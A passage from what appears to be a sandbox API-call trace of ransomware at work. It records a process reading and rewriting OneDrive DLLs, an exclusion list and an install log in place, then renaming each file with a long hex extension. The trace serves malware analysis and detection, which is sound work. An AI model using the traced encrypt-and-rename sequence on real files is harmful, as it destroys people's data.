GetProcessHeap () returned 0x600000 [0112.362] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x162) returned 0x31873f0 [0112.362] NtSetInformationFile (FileHandle=0x318, IoStatusBlock=0x28fff60, FileInformation=0x31873f0, Length=0x162, FileInformationClass=0xa) returned 0x0 [0112.363] CloseHandle (hObject=0x318) returned 1 [0112.363] GetProcessHeap () returned 0x600000 [0112.363] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x688490 | out: hHeap=0x600000) returned 1 [0112.365] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0112.376] ReadFile (in: hFile=0x318, lpBuffer=0x31130f8, nNumberOfBytesToRead=0x4e00, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0) returned 1 [0112.376] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0112.381] WriteFile (in: hFile=0x318, lpBuffer=0x31130f8, nNumberOfBytesToWrite=0x4e00, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0) returned 0x0 [0112.382] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0112.389] NtQueryObject (in: Handle=0x318, ObjectInformationClass=0x1, ObjectInformation=0x30f3070, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x30f3070, ReturnLength=0x28fff70) returned 0x0 [0112.390] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ExclusionList.xml", lpString2=".7B6BE851D386D2DD22A7322847F3170173281B1A5D37ED1D2E98807D6E00E142" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ExclusionList.xml.7B6BE851D386D2DD22A7322847F3170173281B1A5D37ED1D2E98807D6E00E142") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\ExclusionList.xml.7B6BE851D386D2DD22A7322847F3170173281B1A5D37ED1D2E98807D6E00E142" [0112.390] GetProcessHeap () returned 0x600000 [0112.390] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x170) returned 0x31869f0 [0112.390] NtSetInformationFile (FileHandle=0x318, IoStatusBlock=0x28fff60, FileInformation=0x31869f0, Length=0x170, FileInformationClass=0xa) returned 0x0 [0112.394] CloseHandle (hObject=0x318) returned 1 [0112.396] GetProcessHeap () returned 0x600000 [0112.396] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0112.398] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0112.400] ReadFile (in: hFile=0x334, lpBuffer=0x6a85c8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x688490 | out: lpBuffer=0x6a85c8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x688490) returned 1 [0112.400] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0112.400] WriteFile (in: hFile=0x334, lpBuffer=0x6a85c8, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x688490 | out: lpBuffer=0x6a85c8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x688490) returned 0x0 [0112.401] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0112.402] NtQueryObject (in: Handle=0x334, ObjectInformationClass=0x1, ObjectInformation=0x688540, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x688540, ReturnLength=0x28fff70) returned 0x0 [0112.402] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\FileSyncClient.dll", lpString2=".422B2071865982A805D98482DC6DD71729C1F0ECFA9F1B9E2BE63EE4F88AB56D" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\FileSyncClient.dll.422B2071865982A805D98482DC6DD71729C1F0ECFA9F1B9E2BE63EE4F88AB56D") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\FileSyncClient.dll.422B2071865982A805D98482DC6DD71729C1F0ECFA9F1B9E2BE63EE4F88AB56D" [0112.402] GetProcessHeap () returned 0x600000 [0112.402] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x172) returned 0x63a638 [0112.402] NtSetInformationFile (FileHandle=0x334, IoStatusBlock=0x28fff60, FileInformation=0x63a638, Length=0x172, FileInformationClass=0xa) returned 0x0 [0112.404] CloseHandle (hObject=0x334) returned 1 [0112.404] GetProcessHeap () returned 0x600000 [0112.404] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x688490 | out: hHeap=0x600000) returned 1 [0112.406] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0112.410] ReadFile (in: hFile=0x334, lpBuffer=0x31130f8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0) returned 1 [0112.410] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0112.411] WriteFile (in: hFile=0x334, lpBuffer=0x31130f8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0) returned 1 [0112.411] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0112.412] NtQueryObject (in: Handle=0x334, ObjectInformationClass=0x1, ObjectInformation=0x30f3070, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x30f3070, ReturnLength=0x28fff70) returned 0x0 [0112.412] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\FileSyncSessions.dll", lpString2=".7D3E4239DCD4C58F77E74590E9A5992995F322BB6CD9C3EB7E6F5AA6052B842B" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\FileSyncSessions.dll.7D3E4239DCD4C58F77E74590E9A5992995F322BB6CD9C3EB7E6F5AA6052B842B") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\FileSyncSessions.dll.7D3E4239DCD4C58F77E74590E9A5992995F322BB6CD9C3EB7E6F5AA6052B842B" [0112.412] GetProcessHeap () returned 0x600000 [0112.412] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x176) returned 0x63bd30 [0112.412] NtSetInformationFile (FileHandle=0x334, IoStatusBlock=0x28fff60, FileInformation=0x63bd30, Length=0x176, FileInformationClass=0xa) returned 0x0 [0112.413] CloseHandle (hObject=0x334) returned 1 [0112.413] GetProcessHeap () returned 0x600000 [0112.413] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0112.414] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0112.418] ReadFile (in: hFile=0x334, lpBuffer=0x31130f8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30f2fc0) returned 1 [0112.419] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0112.419] WriteFile (in: hFile=0x334, lpBuffer=0x31130f8, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0) returned 0x0 [0112.423] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0112.423] NtQueryObject (in: Handle=0x334, ObjectInformationClass=0x1, ObjectInformation=0x30f3070, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x30f3070, ReturnLength=0x28fff70) returned 0x0 [0112.424] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\FileSyncShell.dll", lpString2=".8E5205F1FCFCF7CEF4C7B1C8EE2E00C079DA0CC79530AEB80FB69EBD7DC7305A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\FileSyncShell.dll.8E5205F1FCFCF7CEF4C7B1C8EE2E00C079DA0CC79530AEB80FB69EBD7DC7305A") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\FileSyncShell.dll.8E5205F1FCFCF7CEF4C7B1C8EE2E00C079DA0CC79530AEB80FB69EBD7DC7305A" [0112.424] GetProcessHeap () returned 0x600000 [0112.424] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x170) returned 0x3186878 [0112.424] NtSetInformationFile (FileHandle=0x334, IoStatusBlock=0x28fff60, FileInformation=0x3186878, Length=0x170, FileInformationClass=0xa) returned 0x0 [0112.426] CloseHandle (hObject=0x334) returned 1 [0112.426] GetProcessHeap () returned 0x600000 [0112.426] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0112.426] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0112.455] WriteFile (in: hFile=0x330, lpBuffer=0x30e82d8, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30c81a0 | out: lpBuffer=0x30e82d8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30c81a0) returned 0x0 [0112.456] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0112.462] NtQueryObject (in: Handle=0x330, ObjectInformationClass=0x1, ObjectInformation=0x30c8250, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x30c8250, ReturnLength=0x28fff70) returned 0x0 [0112.462] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\FileSync.Resources.dll", lpString2=".D597E7F2EBC38FCE7EB280ABFFB1AC0D055934B822501E6E1FB7D083218A6762" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\FileSync.Resources.dll.D597E7F2EBC38FCE7EB280ABFFB1AC0D055934B822501E6E1FB7D083218A6762") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\FileSync.Resources.dll.D597E7F2EBC38FCE7EB280ABFFB1AC0D055934B822501E6E1FB7D083218A6762" [0112.462] GetProcessHeap () returned 0x600000 [0112.462] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x17a) returned 0x63b400 [0112.463] NtSetInformationFile (FileHandle=0x330, IoStatusBlock=0x28fff60, FileInformation=0x63b400, Length=0x17a, FileInformationClass=0xa) returned 0x0 [0112.463] CloseHandle (hObject=0x330) returned 1 [0112.464] GetProcessHeap () returned 0x600000 [0112.464] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30c81a0 | out: hHeap=0x600000) returned 1 [0112.465] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0112.539] WriteFile (in: hFile=0x330, lpBuffer=0x31130f8, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0) returned 0x0 [0112.542] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0112.775] WriteFile (in: hFile=0x328, lpBuffer=0x31130f8, nNumberOfBytesToWrite=0x1200, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0) returned 0x0 [0112.776] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0112.784] ReadFile (in: hFile=0x334, lpBuffer=0x30e82d8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x30c81a0 | out: lpBuffer=0x30e82d8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30c81a0) returned 1 [0112.784] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0112.790] WriteFile (in: hFile=0x334, lpBuffer=0x30e82d8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30c81a0 | out: lpBuffer=0x30e82d8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30c81a0) returned 1 [0112.791] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0112.792] NtQueryObject (in: Handle=0x334, ObjectInformationClass=0x1, ObjectInformation=0x30c8250, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x30c8250, ReturnLength=0x28fff70) returned 0x0 [0112.792] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\sqmapi.dll", lpString2=".27CD469232048A3EDE9DCD09FBA8470BF01B0EC2AA3E954CF049C9A8DB773E2B" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\sqmapi.dll.27CD469232048A3EDE9DCD09FBA8470BF01B0EC2AA3E954CF049C9A8DB773E2B") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\sqmapi.dll.27CD469232048A3EDE9DCD09FBA8470BF01B0EC2AA3E954CF049C9A8DB773E2B" [0112.792] GetProcessHeap () returned 0x600000 [0112.792] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x162) returned 0x315d020 [0112.792] NtSetInformationFile (FileHandle=0x334, IoStatusBlock=0x28fff60, FileInformation=0x315d020, Length=0x162, FileInformationClass=0xa) returned 0x0 [0112.802] CloseHandle (hObject=0x334) returned 1 [0112.803] GetProcessHeap () returned 0x600000 [0112.803] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30c81a0 | out: hHeap=0x600000) returned 1 [0112.805] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0112.832] NtQueryObject (in: Handle=0x310, ObjectInformationClass=0x1, ObjectInformation=0x6603e8, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x6603e8, ReturnLength=0x28fff70) returned 0x0 [0112.833] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\SqmWrapper.dll", lpString2=".CF63DEE0602802B6CFE26840CF9E15402278FC7E73217EFB9DAC1C5C870F7A4A" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\SqmWrapper.dll.CF63DEE0602802B6CFE26840CF9E15402278FC7E73217EFB9DAC1C5C870F7A4A") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_2\\SqmWrapper.dll.CF63DEE0602802B6CFE26840CF9E15402278FC7E73217EFB9DAC1C5C870F7A4A" [0112.833] GetProcessHeap () returned 0x600000 [0112.833] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x16a) returned 0x3187148 [0112.833] NtSetInformationFile (FileHandle=0x310, IoStatusBlock=0x28fff60, FileInformation=0x3187148, Length=0x16a, FileInformationClass=0xa) returned 0x0 [0112.834] CloseHandle (hObject=0x310) returned 1 [0112.834] GetProcessHeap () returned 0x600000 [0112.834] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x660338 | out: hHeap=0x600000) returned 1 [0112.835] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0112.951] ReadFile (in: hFile=0x310, lpBuffer=0x30e82d8, nNumberOfBytesToRead=0x1600, lpNumberOfBytesRead=0x0, lpOverlapped=0x30c81a0 | out: lpBuffer=0x30e82d8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x30c81a0) returned 1 [0112.951] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0112.961] WriteFile (in: hFile=0x324, lpBuffer=0x32c0180*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x32a0048 | out: lpBuffer=0x32c0180*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x32a0048) returned 1 [0112.961] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0113.624] ReadFile (in: hFile=0x328, lpBuffer=0x6a85c8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x688490 | out: lpBuffer=0x6a85c8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x688490) returned 1 [0113.627] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0113.629] NtQueryObject (in: Handle=0x328, ObjectInformationClass=0x1, ObjectInformation=0x688540, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x688540, ReturnLength=0x28fff70) returned 0x0 [0113.629] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\FileSyncApi.dll", lpString2=".7F39EEE1F815CB047901D23559915BDF4330F6FD7841A1543100EF380561C629" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\FileSyncApi.dll.7F39EEE1F815CB047901D23559915BDF4330F6FD7841A1543100EF380561C629") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\FileSyncApi.dll.7F39EEE1F815CB047901D23559915BDF4330F6FD7841A1543100EF380561C629" [0113.629] GetProcessHeap () returned 0x600000 [0113.629] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x16c) returned 0x315c358 [0113.630] NtSetInformationFile (FileHandle=0x328, IoStatusBlock=0x28fff60, FileInformation=0x315c358, Length=0x16c, FileInformationClass=0xa) returned 0x0 [0113.630] CloseHandle (hObject=0x328) returned 1 [0113.631] GetProcessHeap () returned 0x600000 [0113.631] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x688490 | out: hHeap=0x600000) returned 1 [0113.632] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0114.071] WriteFile (in: hFile=0x334, lpBuffer=0x31130f8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0 | out: lpBuffer=0x31130f8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x30f2fc0) returned 1 [0114.072] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0114.163] ReadFile (in: hFile=0x328, lpBuffer=0x6a85c8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x0, lpOverlapped=0x688490 | out: lpBuffer=0x6a85c8*, lpNumberOfBytesRead=0x0, lpOverlapped=0x688490) returned 1 [0114.169] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0114.180] WriteFile (in: hFile=0x32c, lpBuffer=0x32e82d8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x0, lpOverlapped=0x32c81a0 | out: lpBuffer=0x32e82d8*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x32c81a0) returned 1 [0114.181] GetQueuedCompletionStatus (in: CompletionPort=0x274, lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x28fff7c, lpCompletionKey=0x28fff78, lpOverlapped=0x28fff74) returned 1 [0114.182] NtQueryObject (in: Handle=0x32c, ObjectInformationClass=0x1, ObjectInformation=0x32c8250, ObjectInformationLength=0x10004, ReturnLength=0x28fff70 | out: ObjectInformation=0x32c8250, ReturnLength=0x28fff70) returned 0x0 [0114.182] lstrcatW (in: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install-PerUser_2021-02-11_132743_ca8-cac.log", lpString2=".66C9786336C3FEF0D49CF2D53EF721D3A8E9D611E6134694791829FCDD91CA13" | out: lpString1="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install-PerUser_2021-02-11_132743_ca8-cac.log.66C9786336C3FEF0D49CF2D53EF721D3A8E9D611E6134694791829FCDD91CA13") returned="\\Device\\HarddiskVolume1\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\setup\\logs\\Install-PerUser_2021-02-11_132743_ca8-cac.log.66C9786336C3FEF0D49CF2D53EF721D3A8E9D611E6134694791829FCDD91CA13" [0114.182] GetProcessHeap () returned 0x600000 [0114.182] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x19c) returned 0x6b11a8 [0114.183] NtSetInformationFile (FileHandle=0x32c, IoStatusBlock=0x28fff60, FileInformation=0x6b11a8, Length=0x19c, FileInformationClass=0xa) returned 0x0 [0114.186] CloseHandle (hObject=0x32c) returned 1 [0114.186] GetProcessHeap () returned 0x600000 [0114.186] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x32c81a0 | out: hHeap=0x600000) returned 1 [0114.188] GetQueuedCompletionStatus (in: 